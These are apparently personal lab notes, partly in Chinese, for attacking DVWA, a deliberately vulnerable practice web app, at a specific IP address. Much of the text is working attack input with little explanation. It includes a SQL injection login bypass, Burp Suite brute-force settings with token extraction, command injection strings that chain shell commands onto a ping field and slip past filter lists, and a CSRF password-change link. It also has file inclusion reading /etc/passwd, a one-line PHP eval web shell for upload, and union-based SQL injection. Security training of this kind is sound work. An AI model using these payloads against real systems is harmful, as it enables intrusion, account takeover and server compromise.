
	https://blog.csdn.net/qq_29277155/article/details/52726730
	
	https://blog.csdn.net/BROTHERYY/article/details/108142354

Brute Force
	burpsuite
	
	admin' or 1=1 limit 1 -- +
		if( $result && mysqli_num_rows( $result ) == 1 ) {}
		
	
	设置token
		checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
		
		pitchfork
			username=admin&password=§222§&Login=Login&user_token=§953e9335f5805d86b6926df5b2df52e7§ HTTP/1.1
			
		request engine -> number threads -> 1
		grep match -> welcome
		grep extract -> From [ value='] to [' />\r\n\x09\x09</form>]    //taken
		redirections -> always
		
		recursive grep 递归搜索
	
	if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {}
	
Command Injection

	$cmd = shell_exec( 'ping  -c 4 ' . $target ); echo "<pre>{$cmd}</pre>"; 
		127.0.0.1
		127.0.0.1 && ifconfig
		127.0.0.1 && pwd
	
	$substitutions = array(        '&&' => '',   ';'  => '',    );
		127.0 || ifconfig
	
	$substitutions = array(  '&'  => '',  ';'  => '','| ' => '','-'  => '','$'  => '','('  => '', ')'  => '', '`'  => '','||' => '',); 	
			'| ' => '',
				127.0.0.1|ls
			127.0.0.1 |||||| pwd
		
	正则表达式
	
		command1 & command2    command1与command2同时执行，不管command 1是否执行成功
		command1 && command2   先执行command1，如果为真，再执行command2
		command1 | command2    只执行command2
		command1 || command2   先执行command1，如果为假，再执行command2
	
CSRF
	http://1.117.162.201/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
	
File Inclusion
	http://1.117.162.201/dvwa/vulnerabilities/fi/?page=/etc/passwd
	http://1.117.162.201/dvwa/vulnerabilities/fi/?page=/var/www/html/phpinfo.php
	
	
File Upload
	<?php @eval($_POST["password"]);?>
	http://1.117.162.201/dvwa/hackable/uploads/1.php

Insecure CAPTCHA

SQL Injection
	2" or 1=1 -- +
	1' union all select @@datadir,@@basedir#
SQL Injection (Blind)
Weak Session IDs
XSS (DOM)
XSS (Reflected)
XSS (Stored)
CSP Bypass
JavaScript